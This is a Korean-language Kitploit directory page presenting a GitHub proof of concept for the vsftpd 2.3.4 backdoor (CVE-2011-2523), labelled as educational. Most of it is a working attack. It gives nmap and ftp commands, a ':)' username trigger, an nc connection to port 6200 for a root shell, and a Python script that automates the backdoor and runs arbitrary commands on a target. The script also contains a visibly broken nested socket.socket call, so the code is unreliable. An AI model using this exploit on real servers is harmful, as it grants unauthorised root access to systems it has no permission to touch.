Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
vsftpd-2.3.4---Backdoor-Command-Execution — vsftpd 2.3.4 (CVE-2011-2523)는 Reverse Root Shell로 이어지는 치명적인 취약점입니다. 이 저장소에서는 교육 목적으로 이 취약점을 단계별로 악용하는 PoC를 수동 및 자동(Python)으로 진행합니다. | Kitploit
도구/GitHubGitHub/tshaq17/vsftpd-2.3.4---backdoor-command-execution
Payload GenerationVulnerability AnalysisExploitationPenetration TestingLearning & EducationRemote Access Tool
GitHubtshaq17/vsftpd-2.3.4---backdoor-command-execution

vsftpd-2.3.4---Backdoor-Command-Execution

vsftpd 2.3.4 (CVE-2011-2523)는 Reverse Root Shell로 이어지는 치명적인 취약점입니다. 이 저장소에서는 교육 목적으로 이 취약점을 단계별로 악용하는 PoC를 수동 및 자동(Python)으로 진행합니다.

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
저장소 보기
6개월 전아직 검토되지 않음

vsftpd-2.3.4---Backdoor-Command-Execution

vsftpd 2.3.4(CVE-2011-2523)는 Root Shell로 이어지는 치명적인 취약점입니다. 이 저장소에서는 교육 목적으로 이 취약점을 수동 및 자동(Python)으로 단계별로 악용하는 PoC를 제공합니다.

이 취약점은 무엇에 관한 것인가? 먼저, 이것은 서버 측 취약점이므로 원격으로 악용합니다. 기본적으로 21번 포트에서 FTP 서비스에 연결할 때 :)를 포함한 사용자 이름을 사용하면 시스템이 Root Shell과 함께 TCP 6200 포트를 열도록 트리거됩니다. 따라서 누구나 연결하여 대상 서버에 대한 Root 액세스 권한을 얻을 수 있으며, 이는 재앙입니다. 그럼 실제로 단계별로 진행해 보겠습니다. 먼저 수동으로 전체 개념을 설명한 다음, 자동으로 악용하는 Python 스크립트를 제공하겠습니다.

수동

포트 스캔

  1. 포트 21이 열려 있음
root@kitploit:~
nmap -p21 -sV -sC -O Target_IP 
이미지
  1. 포트 6200이 닫혀 있음
root@kitploit:~
nmap -p6200 Target_IP
  • 포트 6200은 현재 닫혀 있습니다. 이미지

악용

  1. FTP 서비스에 연결하고 악성 사용자 이름을 사용하여 시스템이 6200 포트를 열도록 트리거합니다.
root@kitploit:~
ftp Target_IP 
  • 사용자 이름: anything:)
  • 비밀번호: anything 이미지
  1. FTP 연결 후 포트 6200을 확인합니다.
root@kitploit:~
nmap -p6200 Target_IP

이제 포트 6200이 열려 있으므로 이것이 우리의 백도어입니다.

이미지
  1. 포트 6200에 연결하여 전체 서버에서 Root Shell을 획득합니다.
root@kitploit:~
nc -nv Target_IP 6200

마침내 대상 머신에서 Root Shell을 획득했습니다. 이미지


자동으로

수동으로 진행했으니 이제 악용 단계는 다음과 같습니다.

  1. FTP 서버의 21번 포트에 연결합니다.
  2. :)를 포함한 사용자 이름을 사용하여 백도어를 트리거합니다.
  3. 6200 포트에 연결합니다.
root@kitploit:~
#!/usr/bin/python3 

from ftplib import FTP
import socket
import sys
import time

Target_IP = sys.argv[1]
cmd = sys.argv[2]

# Step1: Connect to FTP
try:
  ftp = FTP(Target_IP,timeout=2)
  ftp.login("user:)","password") # Step2: Send the malicious username
except:
  pass

time.sleep(1) # To give a time for the server to open the port (6200)

#Step3: Connect to port (6200) to have a Root Shell
shell = socket.socket(socket.socket(socket.AF_INET, socket.SOCK_STREAM))
try:
  shell.connect((Target_IP,6200))
except:
  print("Shell Failed")

#Execute the commands
shell.send(cmd.encode() + b"\n")
print(shell.recv(4096).decode())

#Finally close the connection
shell.close()
도구 다운로드